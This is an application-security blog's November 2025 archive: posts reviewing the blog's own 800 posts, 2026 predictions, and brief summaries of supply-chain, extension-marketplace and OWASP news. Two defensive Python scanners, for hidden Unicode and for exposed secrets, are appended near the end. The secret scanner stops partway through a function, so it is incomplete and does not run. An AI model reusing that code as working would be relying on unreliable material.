Posts

Showing posts from November, 2025

800 posts, my analysis

After taking a look at these posts (https://appsecadventures.blogspot.com/2025/11/800-posts-where-am-i-and-what-are.html, https://appsecadventures.blogspot.com/2025/11/800-posts-least-common-subjects.html, https://appsecadventures.blogspot.com/2025/11/800-posts-predictions-based-on-rare.html), here are my takes: Obviously, posts are biased based on my interests. So there are a lot of vulnerability management, supply chain security and LLMs and very little about API Security, OWASP Top 10 and scanning tools. This does not mean I am not noticing what's happening. Although LLMs and CoPilots are getting better every day, the dynamics of programming using LLMs, in the long run, may graduate less skilled developers because the intermediate developers (the newbies nowadays) will rely more on tools to write code. So maybe, we will face an educational problem very soon. People will remain the weakest link in the security chain. Attacks are becoming more and more complex and difficult to...

800 posts, predictions based on rare themes

Theme / 2026 Prediction / Rationale

Theme: Mobile Security
2026 prediction: AI-generated malware and cloned mobile apps will cause a resurgence in mobile-security focus.
Rationale: Attackers shift from supply chain to mobile targets using automated phishing and AI-built malware, reversing 2025’s low interest.

Theme: Cybersecurity Policy & Government Shifts
2026 prediction: Governments will introduce major AI safety, disclosure, and cloud-regulation policies.
Rationale: Rising geopolitical tension + legal pressure on CVE disclosure + AI misuse incidents make regulation unavoidable.

Theme: Corporate Expansion & Hiring
2026 prediction: Security hiring becomes remote-first with hubs forming in AI-talent regions (India, Israel, Brazil, Eastern Europe).
Rationale: 2025 showed little expansion news due to slowdown; 2026 hiring follows AI talent density, not geography.

Theme: Cryptographic Governance
2026 prediction: AI-resistant crypto, dataset signing, and model-weight integrity standards expand in regulated sectors.
Rationale: As AI enters finance/healthcare/gov, integrity and post-quantum c...

800 posts, the least common subjects

Least Common Themes / Why They’re Rare (Based on Feed Content)

Mobile security: Only one post touches iOS/Android app-locking and secure folders, and it's from late 2024, not 2025. It’s mentioned again as “going down” in your own meta-post.

Political / policy shifts (e.g., Trump admin cybersecurity posture): Several posts mention policy shifts, but this theme is sparse relative to technical AppSec, supply-chain, and AI content. Appears in 1–2 posts around Oct–Nov.

Corporate expansion / hiring news: Only one post covers a company opening a new facility (OpenText India). These business-expansion stories are rare in your feed.

Cryptographic governance: Appears once as a video entry on governance of cryptographic software. No other cryptography-focused discussions show up in 2025 entries.

Security champion programs / culture building: Only one post highlights security champions (October 2025). Most other posts are about tooling, vulnerabilities, AI, and supply chain...

800 posts, where am I and what are the insights

I started in September. I reached 500 in May, and I am reaching 800 in November. It's clearly fewer posts per month. Of course, I've started to focus on relevance. Popular posts are clearly related to LLMs. NVD is not on the top of the news today, strongly replaced by supply chain attacks. In fact, I think supply chain security was one of the most important subjects this year, as anyone could notice from OWASP Top 10 2025. LLMs are still a hot-as-hell subject. Expanding my sources helped me not to get more news, but to get more tools and more evidence that the most important subjects were the ones I've thought, because most sources were talking about the same things. One thing I'd love to have is some sort of integration with LinkedIn because I am always reading there. I think LinkedIn is like a professional blog for many great professionals that I am always following (Madden, Janca, Shostack, Hughes, Hovesepyan, Cipollone, Rexha, Collman, Buchanan and the list...

VulnCheck Canary Intelligence Brings Real-World Exploit Data to Defenders

VulnCheck Canary Intelligence is a new service that uses a global network of intentionally vulnerable systems (“canaries”) to capture live attacker activity—recording real exploitation of CVEs, attacker IPs, payloads, and more. This telemetry is integrated into VulnCheck’s existing intelligence products to help security teams prioritize vulnerabilities based on real-world exploit behavior, give early warning of active campaigns, and provide verified, actionable data rather than theory.  https://www.vulncheck.com/blog/introducing-vulncheck-canary-intelligence

GoDefender: Anti-Debug & Anti-Virtualization Toolkit for Go Applications

GoDefender is a Go library created by EvilBytecode that helps applications detect and defend against debugging tools, virtualization environments (like VMware or VirtualBox), and code injection techniques. Its modules include anti-debug checks (e.g., detecting if a debugger is attached), virtualization metrics (e.g., identifying sandboxed or emulated environments), and protections against DLL injection.   https://github.com/EvilBytecode/GoDefender

Rebooting the OWASP Threat Modeling Project for Fresh Momentum

The Shostack + Associates blog announces a revival of the OWASP Threat Modeling Project, with Adam Shostack and other security experts stepping in as project leads. The reboot aims to build a more active community, produce practical and cohesive threat modeling guidance, and define a clear charter. They invite contributors from both inside and outside OWASP to join the effort on Slack and GitHub.  https://shostack.org/blog/owasp-threat-model-reboot/

Legal Pacts Are Silencing Vulnerability Researchers, Schneier Warns

Bruce Schneier highlights a talk by Kendra Albert at USENIX Security, arguing that modern bug bounty programs legally gag security researchers. These programs often force researchers into nondisclosure agreements that prevent them from publicly sharing vulnerability findings—even when companies don’t fix the bugs. According to Albert, this undermines the original spirit of coordinated vulnerability disclosure, as it restricts transparency and weakens researcher leverage. https://www.schneier.com/blog/archives/2025/11/legal-restrictions-on-vulnerability-disclosure.html

GPT-5 Generates Significantly More Secure Code Than Previous Models, Report Finds

A Veracode report shows that OpenAI’s reasoning-based GPT-5 models produce more secure code than earlier generations, achieving a 70–72% security pass rate across 80 benchmark coding tasks. The tests focused on common vulnerabilities (like SQL injection and XSS) in multiple programming languages. The improved security is likely due to GPT-5’s internal “reasoning” or self-review steps. Despite the progress, Veracode warns that AI-generated code still needs traditional security measures like code reviews, SAST, and runtime protections. https://www.scworld.com/news/openais-gpt-5-generates-more-secure-code-than-past-models-report-finds

NPM Malware Campaign Uses Visitor Profiling to Evade Detection

A new malware campaign targeting the npm ecosystem uses cloaking techniques to tell real users apart from security researchers. Seven malicious packages created by an actor known as “dino_reborn” redirect users to phishing sites only when the visitor is identified as a likely victim. The payload fingerprints browser behavior and blocks developer tools, keyboard shortcuts, and context menus. If the visitor seems benign (like a researcher), the page stays blank — helping the campaign avoid analysis. https://cybersecuritynews.com/new-npm-malware-campaign/

The Importance of Unified Platforms in Application Security

According to Sonatype, as software delivery becomes more complex and interconnected, organizations are shifting away from fragmented security tools toward unified platforms. Traditional point tools like SAST, DAST, and SCA create silos, redundant alerts, and increased cost. The trend toward “platformization” helps consolidate visibility, streamline remediation, and reduce risk by bringing together supply chain security, posture management, and developer enablement. Application Security Posture Management (ASPM) plays a key role by prioritizing vulnerabilities based on exploitability and business impact. Sonatype also emphasizes the value of curated open-source catalogs that help developers use trusted components while giving security teams better control. In combining these elements, companies can work faster and more securely without drowning in disconnected data. https://www.sonatype.com/blog/the-shift-toward-unified-platforms-in-application-security

Minimus Launches “Image Creator” to Help Teams Build Their Own Secure Container Images

Minimus announced the general availability of “Image Creator,” a feature that lets customers build customized, hardened container images on top of Minimus’s secure platform. These user-built images benefit from Minimus’s exploit intelligence, signed SBOMs, and continuous rebuilds, helping to boost supply chain security and compliance. Minimus also introduced a preview of “Supply Chain Protection,” offering control over open-source package origins, maturity, and usage without changing existing dev workflows. https://www.wboy.com/business/press-releases/cision/20251119NE27753/minimus-revolutionizes-container-security-with-image-creator/

Palo Alto Networks to Acquire Observability Leader Chronosphere for $3.35B

Palo Alto Networks is buying observability platform Chronosphere for $3.35 billion in cash and equity to deepen its AI-era capabilities. The deal will integrate Chronosphere’s always-on, scalable data infrastructure with Palo Alto’s Cortex AgentiX platform, enabling real-time, agent-driven remediation and massive-scale visibility. Chronosphere reported over $160 million in annual recurring revenue and high-growth momentum. The acquisition is expected to close in the second half of Palo Alto’s fiscal 2026. https://www.telecompaper.com/news/palo-alto-to-acquire-containers-observability-platform-chronosphere-for-usd-335-billion--1554697

ActiveState Partners with Trivy to Cut CVE Noise and Ease Developer Alert Fatigue

ActiveState has joined the Trivy Partner Connect program, integrating its VEX advisories, secure language libraries, and container images into Trivy’s scanning. This collaboration brings high-fidelity risk profiles to Trivy users and allows suppression of CVEs that ActiveState deems non-exploitable. The goal is to reduce the volume of noisy, low-value alerts so developers can spend less time investigating vulnerabilities and more time building.  https://www.morningstar.com/news/pr-newswire/20251117sf20225/activestate-joins-trivy-partner-connect-to-cut-cve-noise-and-reduce-alert-fatigue-for-developers

Checkmarx Partners With CredShields to Bring Smart-Contract Security Into Enterprise AppSec

Checkmarx is joining forces with CredShields, a Web3 security firm, to integrate AI-powered smart contract audits, blockchain vulnerability research, and decentralized security tooling into its enterprise application security platform. The collaboration aims to help organizations extend DevSecOps programs into Web3 environments by offering comprehensive coverage for decentralized apps, smart contracts, and wallets. Together, they plan to contribute to global standards like the OWASP Smart Contract Top 10 and make Web3 security part of established corporate pipelines. https://www.prnewswire.com/news-releases/credshields-joins-forces-with-checkmarx-to-bring-smart-contract-security-to-enterprise-appsec-programs-302621714.html

Veracode Raises the Bar for Application Risk Management in the AI Era

Veracode is reinforcing its leadership in application risk management by introducing a holistic, “always-on” security platform tailored for modern, AI-driven development. With AI widening the threat surface and open-source dependencies growing rapidly, Veracode’s platform offers continuous vulnerability detection, real-time fixes, and supply-chain protection. Its unified dashboard gives teams full visibility into their risks, while automated, AI-powered remediation helps prevent dangerous code from even entering production. https://fox40.com/business/press-releases/ein-presswire/868611147/veracode-sets-new-benchmark-for-application-risk-management-securing-modern-development-in-the-ai-era/

AI Could Make Cybersecurity As We Know It Obsolete

Former Cybersecurity and Infrastructure Security Agency head Jen Easterly argues that many breaches stem from fundamentally poor software rather than purely security failures. With the rise of AI, she believes defenders may finally gain the upper hand by leveraging tools that detect flaws and patch vulnerabilities at scale. If software is engineered securely by design and AI is deployed responsibly, she predicts security breaches could become rare anomalies rather than accepted norms. https://www.theregister.com/2025/10/27/jen_easterly_ai_cybersecurity/

Threat Modeling for Modern Supply-Chain Security: How Visibility and Depth Matter

The article argues that effective threat modeling in today’s complex supply chains requires moving beyond surface-level visibility. Rather than just scoping individual tools or vendors, security teams need to model relationships across the full supply-chain ecosystem, including deep tiers. The author recommends using structured approaches (like STRIDE or PASTA) to identify attacker goals, threat actors, and potential attack paths. Crucially, threat modeling should cover build pipelines, policy-as-code, software-component dependencies, and infrastructure — not just the final product. The goal is to shift from reactive security to a proactive, risk-based mindset that anticipates how adversaries might exploit weak links in the chain.  https://www.linkedin.com/pulse/threat-modeling-modern-supply-chain-visibility-beyond-derek-fisher-tliwe/

High Concern, Low Visibility: Supply Chain Cyber Risk Findings

An ISC² survey of over 1,000 cyber professionals shows that concern about cybersecurity risks in third-party supply chains is widespread. A large portion report past incidents originating from suppliers, yet many lack visibility into their vendors’ broader networks. Key challenges include not knowing who their vendors’ vendors are and needing to “trust but can’t verify” supplier security posture. The top threat types identified are data breaches, malware/ransomware, and vulnerabilities in supplier-provided software. To counter these risks, organizations commonly assess third-party risk on a recurring basis (but some only at onboarding) and require vendor compliance with standards, security audits, multi-factor authentication, and incident-response protocols. Some firms have a formal supply-chain risk program; others rely on contracts or ad hoc methods. https://www.isc2.org/Insights/2025/11/2025-isc2-supply-chain-risk-survey

Why the New OWASP Business Logic Abuse Top 10 Matters and What to Do About It

The article discusses the newly released OWASP Business Logic Abuse Top 10, highlighting how business-logic attacks—especially against APIs—are increasingly common, hard to detect, and often bypass traditional security tools. It uses a real-world example involving Burger King’s API to illustrate several abuse patterns, such as missing validation, privilege escalation, and hidden GraphQL endpoints. The piece outlines the ten categories of logic abuse (e.g., over-limits, race conditions, infinite loops, shadow functions) and argues that meeting compliance standards like PCI DSS 4.0 now requires defenses for these nuanced vulnerabilities. It describes how Wallarm’s platform addresses them by baselining expected behavior, enforcing state transitions, validating tokens, and detecting anomalous workflows.  https://securityboulevard.com/2025/11/owasp-top-10-business-logic-abuse-what-you-need-to-know/

What It Means to Be an AppSec Engineer — From Wiz’s Perspective

Wiz describes AppSec engineers as a bridge between development and security teams, responsible for threat modeling, secure architecture reviews, code audits, and embedding security throughout the software development lifecycle. They must master both programming (e.g., Python, Go, Java) and cloud-native security (containers, IaC, serverless), while also communicating effectively with developers. The role demands integrating security tooling (SAST, DAST, SCA) into CI/CD, responding to incidents, and training other teams. Wiz emphasizes career progression—from junior analyst to principal engineer or leadership—with competitive salaries and growing demand in modern DevSecOps environments. To support these engineers, Wiz offers its “Code” product: a unified platform that brings together code scanning, dependency analysis, and infrastructure visibility with cloud context to prioritize real risk.   https://www.wiz.io/academy/appsec-engineers

Top 5 Tools to Harden Your Container Image Security

The article outlines five leading tools for securing container images, highlighting the importance of proactively verifying images for CVEs, misconfigurations, and third-party risks before deployment. It emphasizes that modern tools should not only detect vulnerabilities but also help automate hardening. Among the featured tools is Echo, which uses AI to build and maintain CVE-free base images, offering compliance-friendly variants like FIPS and STIG, all while integrating smoothly into CI/CD pipelines. https://www.developer-tech.com/news/5-best-container-image-security-tools/

Endor Labs Adds Built-In Support for OWASP SPVS to Harden CI/CD Pipelines

Endor Labs now natively supports the OWASP Secure Pipeline Verification Standard (SPVS), enabling teams to apply auditable, automated security controls across the entire software delivery lifecycle. Their platform maps SPVS’s multi-tier framework (Plan, Develop, Integrate, Release, Operate) to its existing capabilities: threat modeling when planning, SAST and secret detection during development, artifact signing and CI pipeline integrity during integration, policy-gated release checks, and runtime monitoring in operation. This integration helps organizations mature their pipeline security in a measurable, standards-aligned way. https://www.endorlabs.com/learn/announcing-native-support-for-owasp-secure-pipeline-verification-standard

Hardened Container Images Dramatically Reduce Vulnerabilities

Many container images are built with a “kitchen-sink” mindset, including a wide range of unnecessary software that results in hundreds of vulnerabilities per image. Several vendors—like Docker, Chainguard, and CleanStart—are now offering “hardened” base images that strip out nonessential components, reduce the attack surface by up to 95%, run as non-root, and come with SBOMs and signed metadata. These secure images often cut vulnerability counts by more than 97%, and are continuously maintained and patched, making them safer foundations for production workloads.  https://www.darkreading.com/application-security/hardened-containers-eliminate-common-source-vulnerabilities

GitHub Actions roadmap leans toward "secure by default"

In discussion #179107 in the GitHub Community, the team behind GitHub Actions outlines upcoming changes (starting December 8, 2025) to the 'pull_request_target' event handling and environment protection rules—aimed at reducing risks when workflows run untrusted code. Community feedback calls for clearer warnings around insecure settings, finer-grained permissions (for example separating "create PRs" from "approve PRs"), scoped secrets to branches/workflows, and stronger audit-style tracing of tokens.  https://github.com/orgs/community/discussions/179107

Using SBOMs Actively to Secure Pull Requests with Heisenberg

The article introduces Heisenberg, an open-source toolkit developed by AppOmni, designed to scan pull requests and detect risky or newly published dependencies before they merge. It shifts the role of Software Bills of Materials (SBOMs) from static records into dynamic security controls, enabling both preventive checks during development and rapid incident-response sweeps afterward. Heisenberg operates via CLI and GitHub Action, analyzing health metrics, age of publications, advisories, and post-install scripts to flag suspicious changes without slowing developer velocity.  https://appomni.com/ao-labs/secure-pull-requests-heisenberg-open-source-security

OWASP Introduces AI Vulnerability Scoring System for Emerging Threats

At the OWASP Global AppSec conference, the organization unveiled the AI Vulnerability Scoring System (AIVSS), a new framework designed to measure risks specific to autonomous and agentic AI systems. Building on traditional scoring models, AIVSS incorporates factors like autonomy, non-determinism, tool use, and dynamic identity. It addresses challenges such as transient AI agent identities and new attack vectors including tool misuse, cascading agent failures, context manipulation, and instruction tampering. The framework is in draft form, with version 1.0 expected next year.  scworld.com/resource/owasp-global-appsec-new-ai-vulnerability-scoring-system-unveiled

Cybersecurity Consolidation Reveals Platform Playbook and Startup Exit Reality

The article argues that the cybersecurity industry is entering a major consolidation phase, with leaders like Pentera’s recent acquisitions serving as case studies. It shows that startups are increasingly built not to dominate markets but to be absorbed as strategic assets—either for technology, customer bases, or talent. For enterprises, the takeaway is that the winning playbook rests on becoming an integrated platform rather than a stand-alone point solution. The shift also signals a harder road for emerging vendors, who must articulate a path beyond being acquired. https://www.forbes.com/sites/alexanderpuutio/2025/11/09/cybersecuritys-consolidation-moment-lessons-from-penteras-acquisitions/

Preventing SOC Burnout Through Smarter Automation and Context

The article explains that burnout in Security Operations Centers can be avoided by reducing alert fatigue, automating repetitive tasks, and improving contextual awareness. It recommends providing analysts with real-time behavioral insights, integrating fresh threat intelligence, and focusing on high-value investigative work rather than constant triage. By prioritizing clarity over alert volume and connecting automation with meaningful context, SOC teams can maintain efficiency, morale, and long-term resilience.  https://thehackernews.com/2025/11/why-soc-burnout-can-be-avoided.html

Scientists Urged to Define a Positive Future for AI

Bruce Schneier and Nathan E. Sanders argue that despite AI’s association with misinformation, surveillance, and environmental harm, scientists must not abandon optimism. They emphasize that researchers have a responsibility to shape AI toward societal benefit by reforming industry norms, exposing misuse, and applying the technology to strengthen communities. The authors call for scientists to lead with a constructive vision—showing how AI can serve humanity rather than simply warning about its dangers.  https://www.schneier.com/blog/archives/2025/11/scientists-need-a-positive-vision-for-ai.html

OWASP Speaker Calls Traditional Risk Management a Waste of Time

At the OWASP Global AppSec conference, cybersecurity expert Adam Shostack criticized traditional risk management models that rely on multiplying likelihood by impact, calling them unreliable and counterproductive. He argued that most organizations lack accurate data to make such calculations meaningful, and that these models often create confusion instead of clarity. Shostack advocated for a shift toward practical threat modeling focused on four key questions: what’s being built, what can go wrong, what can be done about it, and whether the fixes succeeded.  https://www.scworld.com/resource/owasp-global-appsec-risk-management-may-be-a-pointless-waste-of-time

Apache Kafka Is the Hidden Backbone of Modern AI Workflows

The article explains that Apache Kafka already underpins many AI pipelines by managing real-time data streams essential for training and inference. While organizations often view AI as requiring new infrastructure, most rely on Kafka’s ability to handle continuous data ingestion, event processing, and message delivery at scale. It argues that using outdated or batch data undermines AI performance, and Kafka’s streaming architecture naturally solves this, making it a foundational component of reliable, production-grade AI systems.  https://www.computerweekly.com/blog/Open-Source-Insider/Why-Apache-Kafka-is-the-AI-workflow-you-probably-already-have

Malicious “Ransomvibing” Extension Infects Visual Studio Code Marketplace

Security researchers uncovered a Visual Studio Code extension dubbed “Ransomvibing” that encrypted user files and exfiltrated data while managing to pass marketplace review. The extension contained hard-coded decryption keys and simple Python and Node decryptors, indicating unsophisticated but dangerous behavior. The incident exposes major weaknesses in extension marketplace security and highlights how trusted development environments can be exploited to distribute ransomware-like payloads to unsuspecting developers.  https://www.darkreading.com/application-security/ransomvibing-infests-visual-studio-extension-market

Study Finds AI-Generated Malware Overhyped and Ineffective

A recent analysis of multiple AI-generated malware samples revealed that, despite growing hype, such threats remain rudimentary and ineffective in real-world conditions. The code lacked persistence, evasion, and lateral movement capabilities, making it easily detectable by standard security tools. Researchers concluded that traditional malware techniques still pose the greater risk, and current AI-assisted attacks do not yet represent a significant leap in sophistication or danger.  arstechnica.com/security/2025/11/ai-generated-malware-poses-little-real-world-threat-contrary-to-hype/

Aqua Security Announces Leadership Transition to Drive Next Growth Phase

Aqua Security revealed a major leadership change as co-founders Dror Davidoff and Amir Jerbi step back from daily operations to become strategic advisors. Former President and CRO Mike Dube has been appointed CEO, while Nir Makowski, previously SVP of Engineering, becomes Chief Product and Technology Officer. The company, whose cloud-native security platform protects over 40% of the Fortune 100, said the transition positions Aqua for accelerated global expansion and deeper innovation in CNAPP, runtime protection, and vulnerability management.  globenewswire.com/news-release/2025/11/05/3181654/0/en/Aqua-Security-Announces-Leadership-Transition-as-Company-Enters-Its-Next-Phase-of-Growth.html

Maven-Hijack Exposes Hidden Risks in Java Dependency Resolution

The study introduces Maven-Hijack, a supply-chain attack that exploits how Apache Maven and the Java Virtual Machine resolve dependencies. By inserting a malicious class with the same fully qualified name as a trusted one earlier in the dependency chain, attackers can override legitimate functionality without altering project code or library names. Researchers demonstrated the attack by hijacking the Corona-Warn-App’s database logic. They assessed countermeasures such as sealed JARs, Java Modules, and Maven’s Enforcer plugin, concluding that Java Modules offer the strongest defense while the Enforcer plugin provides the most practical mitigation.  https://arxiv.org/pdf/2407.18760

How Autonomous Application Security Testing Transforms DevSecOps

Autonomous Application Security Testing (AAST) uses AI and machine learning to continuously detect, analyze, and remediate vulnerabilities with minimal human input. It integrates techniques like SAST, DAST, SCA, and IAST into CI/CD pipelines, automatically adapting to code changes and prioritizing high-impact issues. This approach accelerates release cycles, improves accuracy, and strengthens shift-left security. Despite its advantages, AAST still faces challenges in data quality, tool integration, and operational maturity across complex development environments.  medium.com/@clouddefenseai/autonomous-application-security-testing-what-it-is-how-it-works-db7eff6e6553

OWASP Top 10 Modernized to Reflect Systemic and Supply-Chain Risks

The 2025 OWASP Top 10 update marks the biggest overhaul since 2021, keeping Broken Access Control as the leading risk while introducing new categories such as Software Supply Chain Failures and Mishandling of Exceptional Conditions. The revision expands the framework’s focus from individual code vulnerabilities to systemic weaknesses across software ecosystems, emphasizing resilience, configuration management, and secure integration practices as key pillars of modern application security.  https://www.resilientcyber.io/p/the-owasp-top-10-gets-modernized

MITRE ATT&CK v18 Redefines Detection with Strategies and Analytics

The v18 update to the MITRE ATT&CK framework replaces brief detection notes with comprehensive Detection Strategies and Analytics that outline adversary behaviors, required telemetry, and platform-specific detection logic. The new version broadens coverage to include Kubernetes, CI/CD environments, cloud identity, and industrial systems. It also formalizes community collaboration through an advisory council, marking a major step toward more actionable, standardized, and behavior-focused threat detection guidance.  https://medium.com/mitre-attack/attack-v18-8f82d839ee9e

How Supply-Chain Attacks Exploit Hidden Trust Assumptions

Trail of Bits highlights that today’s software ecosystems depend on layers of implicit trust—such as package publishers, build systems, and continuous integration pipelines—that attackers increasingly exploit. Techniques like dependency confusion, typosquatting, and maintainer compromise leverage these blind spots. The article urges developers to replace trust by default with verifiable assurance through signed builds, provenance attestations, capability-based security, and continuous validation of supply-chain integrity across development workflows.  https://blog.trailofbits.com/2025/09/24/supply-chain-attacks-are-exploiting-our-assumptions

Datadog Analyzes Lessons from Recent npm Supply-Chain Attacks

Datadog researchers examined recent npm compromises, including the s1ngularity and Shai-Hulud incidents, where attackers targeted package maintainers and injected credential-stealing code through CI workflows. The analysis revealed that weak publishing controls, lack of two-factor authentication, and insufficient dependency monitoring made such breaches possible. Datadog recommends enforcing package age thresholds, auditing dependencies continuously, monitoring metadata for anomalies, and using behavioral detection tools to identify malicious activity before packages reach users.  https://securitylabs.datadoghq.com/articles/learnings-from-recent-npm-compromises

OpenSourceMalware Builds a Community Against Supply-Chain Threats

OpenSourceMalware is a collaborative platform where researchers and developers share intelligence about malicious open-source packages and repositories. It focuses on detecting and cataloging compromised libraries across ecosystems like npm and PyPI, enabling the security community to identify, track, and mitigate supply-chain attacks. By centralizing data on open-source malware and promoting transparent collaboration, the project aims to strengthen collective defenses against increasingly sophisticated threats hidden in trusted codebases.  https://opensourcemalware.com/

OWASP Threat and Safeguard Matrix Links Risks to Defenses

The OWASP Threat and Safeguard Matrix (TaSM) maps common cybersecurity threats such as phishing, supply-chain compromise, and web abuse against the NIST Cybersecurity Framework functions—Identify, Protect, Detect, Respond, and Recover. This approach helps organizations visualize how each safeguard mitigates specific risks, identify coverage gaps, and prioritize defenses based on real business impact. TaSM provides a practical, defense-in-depth structure for aligning technical and procedural controls with enterprise risk management.  https://owasp.org/www-project-threat-and-safeguard-matrix/

Stop Throwing Money at Cyber: Make Every Dollar Matter

The article argues that many cybersecurity budgets are wasted because spending is driven by compliance checkboxes rather than genuine risk reduction. It suggests leaders shift from buying more tools to measuring the real coverage and effectiveness of existing ones, prune overlapping investments, and apply frameworks like zero-based budgeting and total cost of ownership to focus on high-impact, low-effort initiatives.  https://cisotradecraft.substack.com/p/dont-just-spend-it-how-to-stop-your

Inside Anthropic’s Claude Code: Building the Future of Agentic Programming

Anthropic’s team behind Claude Code described how the tool evolved from an experimental prototype into a new paradigm for software engineering. By eliminating the traditional IDE and integrating AI directly into the terminal, Claude Code lets engineers and models share the same environment, using bash commands, sub-agents, and hooks to automate complex workflows. The developers emphasized “dogfooding,” simplicity, extensibility, and building for power users first. They foresee AI-driven coding shifting from single tasks to continuous, autonomous agents running complex projects across devices and domains.

Andrew Ng on Startup Speed, AI Trends, and Responsible Innovation

In a talk at Startup School, Andrew Ng shared lessons from building startups at AI Fund, emphasizing that execution speed is the strongest predictor of success. He urged founders to focus on concrete, buildable ideas, rapid prototyping using AI coding tools, and fast user feedback loops. Ng discussed the rise of agentic AI, the growing importance of understanding AI’s building blocks, and how automation is shifting bottlenecks from engineering to product design. He cautioned against AI hype, defended open source, and stressed ethical, responsible innovation.

OpenAI Launches Aardvark, an AI Agent for Continuous Security Research

OpenAI introduced Aardvark, an autonomous security research agent powered by GPT-5 that scans entire codebases to find and patch vulnerabilities. It performs threat modeling, exploit testing, and automated fix generation while integrating with developer workflows like GitHub. In early trials, Aardvark identified 92% of known vulnerabilities across test repositories and contributed to real CVE discoveries. The system is entering private beta, aiming to make software security proactive and continuous rather than reactive.  https://openai.com/index/introducing-aardvark

Worm Attack Hits VS Code Extension Marketplaces

A self-propagating malware dubbed “GlassWorm” has infiltrated extensions in the Visual Studio Code and OpenVSX marketplaces, stealing developer credentials, draining crypto wallets, installing SOCKS proxies and remote-access trojans, and using hidden Unicode characters to evade detection. Researchers describe it as one of the most advanced supply-chain attacks to date. They urge companies to treat it as an active incident: audit installed extensions, block untrusted marketplaces, revoke compromised credentials, and monitor developer machines for anomalous connections. https://www.csoonline.com/article/4076718/self-propagating-worm-found-in-marketplaces-for-visual-studio-code-extensions-2.html
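The hidden-Unicode trick mentioned above is something a defender can check for directly. The following is an added example, not code from the cited article or from any marketplace: it scans source text for invisible or direction-changing code points (Unicode category Cf, plus a few blank-rendering fillers) and reports line, column and character name, which is enough to review an installed extension's files by hand. The sample JavaScript snippet is constructed for the example.

```python
"""Report invisible or bidi-control Unicode in source text (extension files, scripts)."""
import unicodedata

# Code points outside category Cf that still render as blank in most fonts
# (Hangul fillers); listed explicitly because category alone would miss them.
EXTRA_SUSPECT = {0x115F, 0x1160, 0x3164, 0xFFA0}

# Constructed sample: a VS Code style activate() with three kinds of hidden text.
SAMPLE_SOURCE = (
    'function activate(context) {\n'
    '  const cfg = "update-check";\n'                      # clean line
    '  const hidden = "\u200b\u200b\u200d";\n'              # zero-width space/joiner
    '  const tagged = "ok\U000E0041\U000E0042";\n'           # Unicode "tag" characters
    '  if (user === "admin\u202e") { /* bidi override */ }\n'
    '}\n'
)


def is_hidden(ch: str) -> bool:
    """True for format characters (Cf: zero-width, bidi controls, tags, BOM) and fillers."""
    return unicodedata.category(ch) == "Cf" or ord(ch) in EXTRA_SUSPECT


def scan_text(text: str):
    """Return one finding per hidden character with 1-based line/column and its name."""
    if text.startswith("\ufeff"):  # a leading BOM is ordinary encoding metadata, not hiding
        text = text[1:]
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_hidden(ch):
                findings.append({
                    "line": lineno,
                    "col": col,
                    "codepoint": f"U+{ord(ch):04X}",
                    "name": unicodedata.name(ch, "<unnamed>"),
                })
    return findings


def scan_file(path: str):
    """Scan a file on disk; undecodable bytes are replaced rather than aborting the scan."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SOURCE):
        print(f"line {f['line']} col {f['col']}: {f['codepoint']} {f['name']}")
```

Run it over an extension directory (for example every `.js` under `~/.vscode/extensions`) and treat any hit outside string literals that legitimately need joiners as something to read by eye; the point is not to auto-block but to make the invisible visible before deciding whether to revoke and reinstall.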

How Researchers Uncovered Vulnerabilities in Vibe-Coded Apps

Escape’s security team analyzed more than 5,600 applications built using vibe-coding platforms, identifying over 2,000 vulnerabilities, 400 exposed secrets, and 175 cases of personal data exposure. Their approach combined data collection from public sources, subdomain enumeration, automated attack surface mapping, static scans of frontend bundles, and passive dynamic testing. The methodology emphasized conservative verification to ensure findings were high-confidence and accurately reflected the security risks of low-code and vibe-coding ecosystems.  https://escape.tech/blog/methodology-how-we-discovered-vulnerabilities-apps-built-with-vibe-coding/
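One step of that methodology, the static scan of frontend bundles for exposed secrets, as an added Python example rather than Escape's own tooling. It combines two detectors: regexes for token formats whose shape is fixed (AWS access key IDs start with `AKIA` plus 16 characters; GitHub personal tokens start with `gh` plus a type letter, `_`, and 36 characters) and, for generic `apiKey`/`secret`/`token` assignments, a Shannon-entropy cutoff so that obvious placeholders are not reported. The bundle text, the entropy threshold and the masking format are constructed assumptions; the AWS key in the sample is the documentation example key AWS itself publishes.

```python
"""Scan a minified JavaScript bundle for exposed secrets (added example)."""
import math
import re
from collections import Counter

# Constructed minified bundle. The AWS value is AWS's published documentation
# example key; the other values are made up for this example.
SAMPLE_BUNDLE = (
    '(function(){var e="AKIAIOSFODNN7EXAMPLE";'
    'var t={apiKey:"Zq8vL2mN4xKp9sWd7TbYc3RfHg6JuE1a",'
    'token:"placeholder_token_value_here",debug:!0};\n'
    'var g="ghp_0123456789abcdefghijklmnopqrstuvwxyz";})();\n'
)

# Fixed-shape token formats: a match is high confidence on its own.
KNOWN_FORMATS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
}
# Generic "<keyword> : '<value>'" assignments; confidence comes from the value's entropy.
KEYWORD_ASSIGN = re.compile(
    r"(?i)\b(api[_-]?key|secret|token|password|passwd)\b\s*[\"']?\s*[:=]\s*[\"']([^\"']{16,})[\"']"
)
# Assumed cutoff: a random 32-char mixed-case string scores about 5 bits/char,
# English-like placeholders about 3.5, so 4.0 separates them in this sample.
ENTROPY_THRESHOLD = 4.0


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def _mask(value: str) -> str:
    """Never echo a full candidate secret into a report."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def _line_of(text: str, offset: int) -> int:
    return text.count("\n", 0, offset) + 1


def scan_bundle(text: str):
    """Return findings sorted by line; each carries kind, confidence and a masked value."""
    findings = []
    for kind, pattern in KNOWN_FORMATS.items():
        for m in pattern.finditer(text):
            findings.append({
                "kind": kind, "confidence": "high",
                "line": _line_of(text, m.start()), "value": _mask(m.group(0)),
            })
    for m in KEYWORD_ASSIGN.finditer(text):
        keyword, value = m.group(1), m.group(2)
        entropy = shannon_entropy(value)
        if entropy >= ENTROPY_THRESHOLD:
            findings.append({
                "kind": "keyword_high_entropy", "confidence": "medium",
                "line": _line_of(text, m.start()), "keyword": keyword,
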